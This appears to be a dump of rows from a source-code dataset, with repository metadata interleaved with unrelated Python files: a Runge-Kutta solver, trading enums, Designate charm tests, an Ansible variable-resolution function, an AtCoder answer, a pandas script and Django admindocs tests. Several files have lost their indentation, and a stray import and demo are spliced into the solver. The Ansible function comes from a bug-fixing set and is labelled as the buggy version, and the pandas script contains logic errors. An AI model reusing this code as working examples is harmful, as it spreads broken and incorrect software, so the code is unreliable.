return 0.9*(1 - x[1]*x[1])*x[0] - x[1] + math.sin(x[2])
def fb1(x):
return x[0]
def fc1(x):
return 0.5
def VDP1():
f = [fa1, fb1, fc1]
x = [1, 1, 0]
hs = 0.05
for i in range(20000):
x = rKN(x, f, 3, hs)
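import math  # missing from the original file: fa1/fa2 below call math.sin

# Illustrative self-check (not part of the original): integrate da/dt = -a
# from a(0) = 1 to t = 1 with rKN; classic RK4 lands very close to
# exp(-1) ~= 0.36788.
def demo_decay():
    state = [1.0]
    for _ in range(100):
        state = rKN(state, [lambda x: -x[0]], 1, 0.01)
    print(state[0], math.exp(-1.0))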
def rK3(a, b, c, fa, fb, fc, hs):
a1 = fa(a, b, c)*hs
b1 = fb(a, b, c)*hs
c1 = fc(a, b, c)*hs
ak = a + a1*0.5
bk = b + b1*0.5
ck = c + c1*0.5
a2 = fa(ak, bk, ck)*hs
b2 = fb(ak, bk, ck)*hs
c2 = fc(ak, bk, ck)*hs
ak = a + a2*0.5
bk = b + b2*0.5
ck = c + c2*0.5
a3 = fa(ak, bk, ck)*hs
b3 = fb(ak, bk, ck)*hs
c3 = fc(ak, bk, ck)*hs
ak = a + a3
bk = b + b3
ck = c + c3
a4 = fa(ak, bk, ck)*hs
b4 = fb(ak, bk, ck)*hs
c4 = fc(ak, bk, ck)*hs
a = a + (a1 + 2*(a2 + a3) + a4)/6
b = b + (b1 + 2*(b2 + b3) + b4)/6
c = c + (c1 + 2*(c2 + c3) + c4)/6
return a, b, c
def fa2(a, b, c):
return 0.9*(1 - b*b)*a - b + math.sin(c)
def fb2(a, b, c):
return a
def fc2(a, b, c):
return 0.5
def VDP2():
a, b, c, hs = 1, 1, 0, 0.05
for i in range(20000):
a, b, c = rK3(a, b, c, fa2, fb2, fc2, hs) | [
"[email protected]"
] | |
ce033b921042d603ac116dcbe76a4c8e40f95ad7 | a227947112fe8a3fd8078bcdfee22b82385f5490 | /aat/config/enums.py | 25fa292208b39967d8415ad9fd63dbece71a9fc3 | [
"Apache-2.0"
] | permissive | Sahanduiuc/aat-1 | 43465f6060d084a5442af8685266e0cd009a8626 | 0aee0f9943b5e16f29ec69faea5f9e5a937c5e5d | refs/heads/master | 2022-11-15T21:16:28.580803 | 2020-06-14T22:14:37 | 2020-06-14T22:14:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | from enum import Enum
class BaseEnum(Enum):
def __str__(self):
return f'{self.value}'
class Side(BaseEnum):
BUY = 'BUY'
SELL = 'SELL'
class EventType(BaseEnum):
# Trade events
TRADE = 'TRADE'
# Order events
OPEN = 'OPEN'
CANCEL = 'CANCEL'
CHANGE = 'CHANGE'
FILL = 'FILL'
# Other data events
DATA = 'DATA'
# System events
HALT = 'HALT'
CONTINUE = 'CONTINUE'
# Engine events
ERROR = 'ERROR'
START = 'START'
EXIT = 'EXIT'
class DataType(BaseEnum):
ORDER = 'ORDER'
TRADE = 'TRADE'
class InstrumentType(BaseEnum):
CURRENCY = 'CURRENCY'
# PAIR = 'PAIR'
EQUITY = 'EQUITY'
# BOND = 'BOND'
# OPTION = 'OPTION'
# FUTURE = 'FUTURE'
class OrderType(BaseEnum):
# Order Types
LIMIT = 'LIMIT'
MARKET = 'MARKET'
STOP = 'STOP'
class OrderFlag(BaseEnum):
# Order Flag
NONE = 'NONE'
FILL_OR_KILL = 'FILL_OR_KILL'
ALL_OR_NONE = 'ALL_OR_NONE'
IMMEDIATE_OR_CANCEL = 'IMMEDIATE_OR_CANCEL'
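# Minimal usage sketch (illustrative): BaseEnum.__str__ makes members print
# as their raw string values.
if __name__ == '__main__':
    print(Side.BUY)                # -> BUY
    print(OrderFlag.FILL_OR_KILL)  # -> FILL_OR_KILL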
| [
"[email protected]"
] | |
a41229319392a641d67d38fb9bac9372fa60c208 | 731951e8b75b45f427d44ecbae7b1a3445dcce33 | /unit_tests/test_designate_handlers.py | b93acf70ae1ddbce0ffd2204016a2eb333959926 | [
"Apache-2.0"
] | permissive | falfaro/charm-designate | 096eccce95d2d2f360afd7ee92f9b33cef990fbb | 385e4cf8cd1da1a02df5f6e8981b41c0c8e9a2bb | refs/heads/master | 2020-12-31T00:30:33.345747 | 2017-03-29T07:20:31 | 2017-03-29T07:20:31 | 86,549,157 | 0 | 0 | null | 2017-03-29T07:02:16 | 2017-03-29T07:02:16 | null | UTF-8 | Python | false | false | 9,051 | py | from __future__ import absolute_import
from __future__ import print_function
import unittest
import mock
import reactive.designate_handlers as handlers
_when_args = {}
_when_not_args = {}
def mock_hook_factory(d):
def mock_hook(*args, **kwargs):
def inner(f):
# remember what we were passed. Note that we can't actually
# determine the class we're attached to, as the decorator only gets
# the function.
try:
d[f.__name__].append(dict(args=args, kwargs=kwargs))
except KeyError:
d[f.__name__] = [dict(args=args, kwargs=kwargs)]
return f
return inner
return mock_hook
class TestDesignateHandlers(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._patched_when = mock.patch('charms.reactive.when',
mock_hook_factory(_when_args))
cls._patched_when_started = cls._patched_when.start()
cls._patched_when_not = mock.patch('charms.reactive.when_not',
mock_hook_factory(_when_not_args))
cls._patched_when_not_started = cls._patched_when_not.start()
        # force requires to rerun the mock_hook decorator;
        # the try/except handles Python 2/3 compatibility, as Python 3 moved
        # reload into importlib.
try:
reload(handlers)
except NameError:
import importlib
importlib.reload(handlers)
@classmethod
def tearDownClass(cls):
cls._patched_when.stop()
cls._patched_when_started = None
cls._patched_when = None
cls._patched_when_not.stop()
cls._patched_when_not_started = None
cls._patched_when_not = None
# and fix any breakage we did to the module
try:
reload(handlers)
except NameError:
import importlib
importlib.reload(handlers)
def setUp(self):
self._patches = {}
self._patches_start = {}
def tearDown(self):
for k, v in self._patches.items():
v.stop()
setattr(self, k, None)
self._patches = None
self._patches_start = None
def patch(self, obj, attr, return_value=None):
mocked = mock.patch.object(obj, attr)
self._patches[attr] = mocked
started = mocked.start()
started.return_value = return_value
self._patches_start[attr] = started
setattr(self, attr, started)
def test_registered_hooks(self):
# test that the hooks actually registered the relation expressions that
# are meaningful for this interface: this is to handle regressions.
# The keys are the function names that the hook attaches to.
all_interfaces = (
'dns-backend.available',
'shared-db.available',
'identity-service.available',
'amqp.available')
when_patterns = {
'setup_amqp_req': [('amqp.connected', )],
'setup_database': [('shared-db.connected', )],
'setup_endpoint': [('identity-service.connected', )],
'configure_ssl': [('identity-service.available', )],
'update_peers': [('cluster.available', )],
'config_changed': [('config.changed', )],
'cluster_connected': [('ha.connected', )],
'create_servers_and_domains': [
all_interfaces,
('base-config.rendered', ),
('db.synched', ),
],
'configure_designate_full': [
all_interfaces,
('db.synched', ),
],
'run_db_migration': [
all_interfaces,
('base-config.rendered', ),
],
'configure_designate_basic': [
all_interfaces,
],
}
when_not_patterns = {
'install_packages': [('installed', )],
'run_db_migration': [('db.synched', )],
'configure_designate_basic': [('base-config.rendered', )],
'create_servers_and_domains': [('domains.created', )],
}
# check the when hooks are attached to the expected functions
for t, p in [(_when_args, when_patterns),
(_when_not_args, when_not_patterns)]:
for f, args in t.items():
# check that function is in patterns
print(f)
self.assertTrue(f in p.keys())
                # check that the lists are equal
                call_args = [a['args'] for a in args]
                self.assertEqual(call_args, p[f])
def test_install_packages(self):
self.patch(handlers.designate, 'install')
self.patch(handlers.reactive, 'set_state')
handlers.install_packages()
self.install.assert_called_once_with()
self.set_state.assert_called_once_with('installed')
def test_setup_amqp_req(self):
self.patch(handlers.designate, 'assess_status')
amqp = mock.MagicMock()
handlers.setup_amqp_req(amqp)
amqp.request_access.assert_called_once_with(
username='designate', vhost='openstack')
self.assess_status.assert_called_once_with()
def test_database(self):
self.patch(handlers.designate, 'assess_status')
database = mock.MagicMock()
handlers.setup_database(database)
calls = [
mock.call(
'designate',
'designate',
prefix='designate'),
mock.call(
'dpm',
'dpm',
prefix='dpm'),
]
        database.configure.assert_has_calls(calls)  # 'has_calls' was a silent no-op on a mock
self.assess_status.assert_called_once_with()
def test_setup_endpoint(self):
self.patch(handlers.designate, 'assess_status')
self.patch(handlers.designate, 'register_endpoints')
handlers.setup_endpoint('endpoint_object')
self.register_endpoints.assert_called_once_with('endpoint_object')
self.assess_status.assert_called_once_with()
def test_configure_designate_basic(self):
self.patch(handlers.reactive, 'set_state')
self.patch(handlers.designate, 'render_base_config')
self.patch(handlers.reactive.RelationBase, 'from_state')
handlers.configure_designate_basic('arg1', 'arg2')
self.render_base_config.assert_called_once_with(('arg1', 'arg2', ))
self.set_state.assert_called_once_with('base-config.rendered')
def test_run_db_migration(self):
self.patch(handlers.reactive, 'set_state')
self.patch(handlers.designate, 'db_sync')
self.patch(handlers.designate, 'db_sync_done')
self.db_sync_done.return_value = False
handlers.run_db_migration('arg1', 'arg2')
self.db_sync.assert_called_once_with()
self.assertFalse(self.set_state.called)
self.db_sync.reset_mock()
self.db_sync_done.return_value = True
handlers.run_db_migration('arg1', 'arg2')
self.db_sync.assert_called_once_with()
self.set_state.assert_called_once_with('db.synched')
def test_update_peers(self):
cluster = mock.MagicMock()
self.patch(handlers.designate, 'update_peers')
handlers.update_peers(cluster)
self.update_peers.assert_called_once_with(cluster)
def test_configure_designate_full(self):
self.patch(handlers.reactive.RelationBase, 'from_state',
return_value=None)
self.patch(handlers.designate, 'upgrade_if_available')
self.patch(handlers.designate, 'configure_ssl')
self.patch(handlers.designate, 'render_full_config')
self.patch(handlers.designate, 'create_initial_servers_and_domains')
self.patch(handlers.designate, 'render_sink_configs')
self.patch(handlers.designate, 'render_rndc_keys')
self.patch(handlers.designate, 'update_pools')
handlers.configure_designate_full('arg1', 'arg2')
self.configure_ssl.assert_called_once_with()
self.render_full_config.assert_called_once_with(('arg1', 'arg2', ))
self.create_initial_servers_and_domains.assert_called_once_with()
self.render_sink_configs.assert_called_once_with(('arg1', 'arg2', ))
self.render_rndc_keys.assert_called_once_with()
self.update_pools.assert_called_once_with()
self.upgrade_if_available.assert_called_once_with(('arg1', 'arg2', ))
def test_cluster_connected(self):
hacluster = mock.MagicMock()
self.patch(handlers.designate, 'configure_ha_resources')
self.patch(handlers.designate, 'assess_status')
handlers.cluster_connected(hacluster)
self.configure_ha_resources.assert_called_once_with(hacluster)
self.assess_status.assert_called_once_with()
def test_config_changed(self):
self.patch(handlers.designate, 'assess_status')
handlers.config_changed()
self.assess_status.assert_called_once_with()
| [
"[email protected]"
] | |
39c5d3e06b0fad48616e9688fc70e2af251dee01 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/c65b7eb52e3f1999292f845bce19d7f541645f76-<get_vars>-bug.py | 57b28261fcc6bd7b9b54383cb83a1463a1812690 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,662 | py | def get_vars(self, play=None, host=None, task=None, include_hostvars=True, include_delegate_to=True, use_cache=True):
    """
    Returns the variables, with optional "context" given via the parameters
    for the play, host, and task (which could possibly result in different
    sets of variables being returned due to the additional context).

    The order of precedence is:
    - play->roles->get_default_vars (if there is a play context)
    - group_vars_files[host] (if there is a host context)
    - host_vars_files[host] (if there is a host context)
    - host->get_vars (if there is a host context)
    - fact_cache[host] (if there is a host context)
    - play vars (if there is a play context)
    - play vars_files (if there's no host context, ignore
      file names that cannot be templated)
    - task->get_vars (if there is a task context)
    - vars_cache[host] (if there is a host context)
    - extra vars
    """
display.debug('in VariableManager get_vars()')
all_vars = dict()
magic_variables = self._get_magic_variables(play=play, host=host, task=task, include_hostvars=include_hostvars, include_delegate_to=include_delegate_to)
basedirs = [self._loader.get_basedir()]
if play:
for role in play.get_roles():
all_vars = combine_vars(all_vars, role.get_default_vars())
if task:
if (C.PLAYBOOK_VARS_ROOT == 'all'):
basedirs = task.get_search_path()
elif (C.PLAYBOOK_VARS_ROOT in ('bottom', 'playbook_dir')):
basedirs = [task.get_search_path()[0]]
elif (C.PLAYBOOK_VARS_ROOT != 'top'):
            raise AnsibleError(('Unknown playbook vars logic: %s' % C.PLAYBOOK_VARS_ROOT))
if ((task._role is not None) and (play or (task.action == 'include_role'))):
all_vars = combine_vars(all_vars, task._role.get_default_vars(dep_chain=task.get_dep_chain()))
if host:
all_group = self._inventory.groups.get('all')
host_groups = sort_groups([g for g in host.get_groups() if (g.name not in ['all'])])
def _get_plugin_vars(plugin, path, entities):
data = {
}
try:
data = plugin.get_vars(self._loader, path, entities)
except AttributeError:
try:
for entity in entities:
if isinstance(entity, Host):
data.update(plugin.get_host_vars(entity.name))
else:
data.update(plugin.get_group_vars(entity.name))
except AttributeError:
if hasattr(plugin, 'run'):
raise AnsibleError(('Cannot use v1 type vars plugin %s from %s' % (plugin._load_name, plugin._original_path)))
else:
raise AnsibleError(('Invalid vars plugin %s from %s' % (plugin._load_name, plugin._original_path)))
return data
def _plugins_inventory(entities):
' merges all entities by inventory source '
data = {
}
for inventory_dir in self._inventory._sources:
if ((',' in inventory_dir) and (not os.path.exists(inventory_dir))):
continue
elif (not os.path.isdir(inventory_dir)):
inventory_dir = os.path.dirname(inventory_dir)
for plugin in vars_loader.all():
data = combine_vars(data, _get_plugin_vars(plugin, inventory_dir, entities))
return data
def _plugins_play(entities):
' merges all entities adjacent to play '
data = {
}
for plugin in vars_loader.all():
for path in basedirs:
data = combine_vars(data, _get_plugin_vars(plugin, path, entities))
return data
def all_inventory():
return all_group.get_vars()
def all_plugins_inventory():
return _plugins_inventory([all_group])
def all_plugins_play():
return _plugins_play([all_group])
def groups_inventory():
' gets group vars from inventory '
return get_group_vars(host_groups)
def groups_plugins_inventory():
' gets plugin sources from inventory for groups '
return _plugins_inventory(host_groups)
def groups_plugins_play():
' gets plugin sources from play for groups '
return _plugins_play(host_groups)
def plugins_by_groups():
            """
            Merges all plugin sources by group.
            This should be used instead, NOT in combination with the other
            groups_plugins* functions.
            """
data = {
}
for group in host_groups:
data[group] = combine_vars(data[group], _plugins_inventory(group))
data[group] = combine_vars(data[group], _plugins_play(group))
return data
for entry in C.VARIABLE_PRECEDENCE:
if (entry in self._ALLOWED):
display.debug(('Calling %s to load vars for %s' % (entry, host.name)))
all_vars = combine_vars(all_vars, locals()[entry]())
else:
display.warning(('Ignoring unknown variable precedence entry: %s' % entry))
all_vars = combine_vars(all_vars, host.get_vars())
all_vars = combine_vars(all_vars, _plugins_inventory([host]))
all_vars = combine_vars(all_vars, _plugins_play([host]))
try:
facts = self._fact_cache.get(host.name, {
})
all_vars.update(namespace_facts(facts))
if C.INJECT_FACTS_AS_VARS:
all_vars = combine_vars(all_vars, wrap_var(facts))
else:
all_vars = combine_vars(all_vars, wrap_var({
'ansible_local': facts.get('ansible_local', {
}),
}))
except KeyError:
pass
if play:
all_vars = combine_vars(all_vars, play.get_vars())
vars_files = play.get_vars_files()
try:
for vars_file_item in vars_files:
temp_vars = combine_vars(all_vars, self._extra_vars)
temp_vars = combine_vars(temp_vars, magic_variables)
templar = Templar(loader=self._loader, variables=temp_vars)
vars_file_list = vars_file_item
if (not isinstance(vars_file_list, list)):
vars_file_list = [vars_file_list]
try:
for vars_file in vars_file_list:
vars_file = templar.template(vars_file)
try:
data = preprocess_vars(self._loader.load_from_file(vars_file, unsafe=True))
if (data is not None):
for item in data:
all_vars = combine_vars(all_vars, item)
break
except AnsibleFileNotFound:
continue
except AnsibleParserError:
raise
else:
if include_delegate_to:
raise AnsibleFileNotFound(('vars file %s was not found' % vars_file_item))
except (UndefinedError, AnsibleUndefinedVariable):
if ((host is not None) and self._fact_cache.get(host.name, dict()).get('module_setup') and (task is not None)):
raise AnsibleUndefinedVariable(("an undefined variable was found when attempting to template the vars_files item '%s'" % vars_file_item), obj=vars_file_item)
else:
display.vvv(("skipping vars_file '%s' due to an undefined variable" % vars_file_item))
continue
display.vvv(("Read vars_file '%s'" % vars_file_item))
except TypeError:
raise AnsibleParserError(("Error while reading vars files - please supply a list of file names. Got '%s' of type %s" % (vars_files, type(vars_files))))
if (not C.DEFAULT_PRIVATE_ROLE_VARS):
for role in play.get_roles():
all_vars = combine_vars(all_vars, role.get_vars(include_params=False))
if task:
if task._role:
all_vars = combine_vars(all_vars, task._role.get_vars(task.get_dep_chain(), include_params=False))
all_vars = combine_vars(all_vars, task.get_vars())
if host:
all_vars = combine_vars(all_vars, self._vars_cache.get(host.get_name(), dict()))
all_vars = combine_vars(all_vars, self._nonpersistent_fact_cache.get(host.name, dict()))
if task:
if task._role:
all_vars = combine_vars(all_vars, task._role.get_role_params(task.get_dep_chain()))
all_vars = combine_vars(all_vars, task.get_include_params())
all_vars = combine_vars(all_vars, self._extra_vars)
all_vars = combine_vars(all_vars, magic_variables)
if task:
all_vars['environment'] = task.environment
if (task and (task.delegate_to is not None) and include_delegate_to):
all_vars['ansible_delegated_vars'] = self._get_delegated_vars(play, task, all_vars)
if (task or play):
all_vars['vars'] = all_vars.copy()
display.debug('done with get_vars()')
return all_vars | [
"[email protected]"
] | |
9b58eff7ed3daf3e244f4bf1236dffbbb10d87fc | a222e2999251ba7f0d62c428ba8cc170b6d0b3b7 | /AtC_Beg_Con_111-120/ABC111/B-AtCoder_Beginner_Contest_111.py | 81b7210ed85e1fae5ea424f1edba455792a672aa | [
"MIT"
] | permissive | yosho-18/AtCoder | 3e1f3070c5eb44f154c8104fbd5449f47446ce14 | 50f6d5c92a01792552c31ac912ce1cd557b06fb0 | refs/heads/master | 2020-06-02T10:21:29.458365 | 2020-05-29T12:40:48 | 2020-05-29T12:40:48 | 188,795,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
if n <= 111:
print(111)
if n > 111 and n <= 222:
print(222)
if n > 222 and n <= 333:
print(333)
if n > 333 and n <= 444:
print(444)
if n > 444 and n <= 555:
print(555)
if n > 555 and n <= 666:
print(666)
if n > 666 and n <= 777:
print(777)
if n > 777 and n <= 888:
print(888)
if n > 888 and n <= 999:
print(999) | [
"[email protected]"
] | |
7ea4bcf5409fe244dc0f83e9747b2ac105b38bb1 | 1b05b6f4d96a14ba2beea7ff43bdaae124bbe41b | /Gdt/algorithm/algorithm/dxregulation.py | f4f402d65a63ddd6ec0dcb3c4fc66b74c731761b | [] | no_license | shmilyrj126/NetWork | 27fcbde777c6ee25abfdd09a381c1a7a743d742a | 957f0679f01d2a09d217516518ddd9693c0b2a80 | refs/heads/master | 2022-12-13T00:19:04.208089 | 2020-09-17T12:59:29 | 2020-09-17T12:59:29 | 296,340,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 22 09:11:21 2019
@author: hsc
"""
import numpy as np
import pandas as pd  # import the pandas package
data1= pd.read_csv("C:\\Users\\hsc\\Desktop\\w4.csv")
data2= pd.read_csv("C:\\Users\\hsc\\Desktop\\w5.csv")
print(data1)
print(data2)
n = len(data1)
data3 = pd.DataFrame(columns=["N", "1", "2", "3"])  # DataFrame comes from pandas; 'columns==' was a syntax error
for i in range(n):  # 'for i in n' would raise TypeError on an int
    # '=' in the condition was a syntax error; element-wise comparison is the apparent intent
    if data1["V1"][i] == data2["N1"][i]:
        data3["N"] = data2.index
| [
"[email protected]"
] | |
7586f72297b50d92a4df016f506943d913a98140 | 3a891a79be468621aae43defd9a5516f9763f36e | /desktop/core/ext-py/Django-1.11/tests/admin_docs/test_views.py | bd483007c7553bfdb214341ed689c51dc66bb467 | [
"BSD-3-Clause",
"Python-2.0",
"Apache-2.0"
] | permissive | oyorooms/hue | b53eb87f805063a90f957fd2e1733f21406269aa | 4082346ef8d5e6a8365b05752be41186840dc868 | refs/heads/master | 2020-04-15T20:31:56.931218 | 2019-01-09T19:02:21 | 2019-01-09T19:05:36 | 164,998,117 | 4 | 2 | Apache-2.0 | 2019-01-10T05:47:36 | 2019-01-10T05:47:36 | null | UTF-8 | Python | false | false | 14,953 | py | from __future__ import unicode_literals
import sys
import unittest
from django.conf import settings
from django.contrib.admindocs import utils, views
from django.contrib.admindocs.views import get_return_data_type, simplify_regex
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import fields
from django.test import SimpleTestCase, modify_settings, override_settings
from django.test.utils import captured_stderr
from django.urls import reverse
from django.utils import six
from .models import Company, Person
from .tests import AdminDocsTestCase, TestDataMixin
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewTests(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_index(self):
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(response, '<h1>Documentation</h1>', html=True)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
self.client.logout()
response = self.client.get(reverse('django-admindocs-docroot'), follow=True)
# Should display the login screen
self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True)
def test_bookmarklets(self):
response = self.client.get(reverse('django-admindocs-bookmarklets'))
self.assertContains(response, '/admindocs/views/')
def test_templatetag_index(self):
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True)
def test_templatefilter_index(self):
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True)
def test_view_index(self):
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>',
html=True
)
self.assertContains(response, 'Views by namespace test')
self.assertContains(response, 'Name: <code>test:func</code>.')
@unittest.skipIf(six.PY2, "Python 2 doesn't support __qualname__.")
def test_view_index_with_method(self):
"""
Views that are methods are listed correctly.
"""
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>',
html=True
)
def test_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView'])
response = self.client.get(url)
# View docstring
self.assertContains(response, 'Base view for admindocs views.')
@override_settings(ROOT_URLCONF='admin_docs.namespace_urls')
def test_namespaced_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass'])
response = self.client.get(url)
self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>')
def test_view_detail_illegal_import(self):
url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view'])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_view_detail_as_method(self):
"""
Views that are methods can be displayed.
"""
url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index'])
response = self.client.get(url)
self.assertEqual(response.status_code, 200 if six.PY3 else 404)
def test_model_index(self):
response = self.client.get(reverse('django-admindocs-models-index'))
self.assertContains(
response,
'<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>',
html=True
)
def test_template_detail(self):
response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html']))
self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True)
def test_missing_docutils(self):
utils.docutils_is_available = False
try:
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(
response,
'<h3>The admin documentation system requires Python\'s '
'<a href="http://docutils.sf.net/">docutils</a> library.</h3>',
html=True
)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
finally:
utils.docutils_is_available = True
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
@override_settings(SITE_ID=None) # will restore SITE_ID after the test
def test_no_sites_framework(self):
"""
Without the sites framework, should not access SITE_ID or Site
objects. Deleting settings is fine here as UserSettingsHolder is used.
"""
Site.objects.all().delete()
del settings.SITE_ID
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(response, 'View documentation')
@override_settings(TEMPLATES=[{
'NAME': 'ONE',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}, {
'NAME': 'TWO',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}])
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewWithMultipleEngines(AdminDocViewTests):
def test_templatefilter_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<title>Template filters</title>', html=True)
def test_templatetag_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<title>Template tags</title>', html=True)
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class TestModelDetailView(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
with captured_stderr() as self.docutils_stderr:
self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person']))
def test_method_excludes(self):
"""
Methods that begin with strings defined in
``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE``
shouldn't be displayed in the admin docs.
"""
self.assertContains(self.response, "<td>get_full_name</td>")
self.assertNotContains(self.response, "<td>_get_full_name</td>")
self.assertNotContains(self.response, "<td>add_image</td>")
self.assertNotContains(self.response, "<td>delete_image</td>")
self.assertNotContains(self.response, "<td>set_status</td>")
self.assertNotContains(self.response, "<td>save_changes</td>")
def test_methods_with_arguments(self):
"""
        Methods that take arguments should also be displayed.
"""
self.assertContains(self.response, "<h3>Methods with arguments</h3>")
self.assertContains(self.response, "<td>rename_company</td>")
self.assertContains(self.response, "<td>dummy_function</td>")
self.assertContains(self.response, "<td>suffix_company_name</td>")
def test_methods_with_arguments_display_arguments(self):
"""
Methods with arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>new_name</td>")
def test_methods_with_arguments_display_arguments_default_value(self):
"""
Methods with keyword arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>suffix='ltd'</td>")
def test_methods_with_multiple_arguments_display_arguments(self):
"""
Methods with multiple arguments should have all their arguments
        displayed, omitting 'self'.
"""
self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>")
def test_method_data_types(self):
company = Company.objects.create(name="Django")
person = Person.objects.create(first_name="Human", last_name="User", company=company)
self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integer')
self.assertEqual(get_return_data_type(person.get_groups_list.__name__), 'List')
def test_descriptions_render_correctly(self):
"""
The ``description`` field should render correctly for each field type.
"""
# help text in fields
self.assertContains(self.response, "<td>first name - The person's first name</td>")
self.assertContains(self.response, "<td>last name - The person's last name</td>")
# method docstrings
self.assertContains(self.response, "<p>Get the full name of the person</p>")
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
markup = '<p>the related %s object</p>'
company_markup = markup % (link % ("admin_docs.company", "admin_docs.Company"))
# foreign keys
self.assertContains(self.response, company_markup)
# foreign keys with help text
self.assertContains(self.response, "%s\n - place of work" % company_markup)
# many to many fields
self.assertContains(
self.response,
"number of related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
self.assertContains(
self.response,
"all related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
# "raw" and "include" directives are disabled
self.assertContains(self.response, '<p>"raw" directive disabled.</p>',)
self.assertContains(self.response, '.. raw:: html\n :file: admin_docs/evilfile.txt')
self.assertContains(self.response, '<p>"include" directive disabled.</p>',)
self.assertContains(self.response, '.. include:: admin_docs/evilfile.txt')
out = self.docutils_stderr.getvalue()
self.assertIn('"raw" directive disabled', out)
self.assertIn('"include" directive disabled', out)
def test_model_with_many_to_one(self):
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
response = self.client.get(
reverse('django-admindocs-models-detail', args=['admin_docs', 'company'])
)
self.assertContains(
response,
"number of related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
self.assertContains(
response,
"all related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
def test_model_with_no_backward_relations_render_only_relevant_fields(self):
"""
A model with ``related_name`` of `+` shouldn't show backward
relationship links.
"""
response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'family']))
fields = response.context_data.get('fields')
self.assertEqual(len(fields), 2)
def test_model_docstring_renders_correctly(self):
summary = (
'<h2 class="subhead"><p>Stores information about a person, related to <a class="reference external" '
'href="/admindocs/models/myapp.company/">myapp.Company</a>.</p></h2>'
)
subheading = '<p><strong>Notes</strong></p>'
body = '<p>Use <tt class="docutils literal">save_changes()</tt> when saving this object.</p>'
model_body = (
'<dl class="docutils"><dt><tt class="'
'docutils literal">company</tt></dt><dd>Field storing <a class="'
'reference external" href="/admindocs/models/myapp.company/">'
'myapp.Company</a> where the person works.</dd></dl>'
)
self.assertContains(self.response, 'DESCRIPTION')
self.assertContains(self.response, summary, html=True)
self.assertContains(self.response, subheading, html=True)
self.assertContains(self.response, body, html=True)
self.assertContains(self.response, model_body, html=True)
def test_model_detail_title(self):
self.assertContains(self.response, '<h1>admin_docs.Person</h1>', html=True)
class CustomField(models.Field):
description = "A custom field type"
class DescriptionLackingField(models.Field):
pass
class TestFieldType(unittest.TestCase):
def setUp(self):
pass
def test_field_name(self):
with self.assertRaises(AttributeError):
views.get_readable_field_data_type("NotAField")
def test_builtin_fields(self):
self.assertEqual(
views.get_readable_field_data_type(fields.BooleanField()),
'Boolean (Either True or False)'
)
def test_custom_fields(self):
self.assertEqual(views.get_readable_field_data_type(CustomField()), 'A custom field type')
self.assertEqual(
views.get_readable_field_data_type(DescriptionLackingField()),
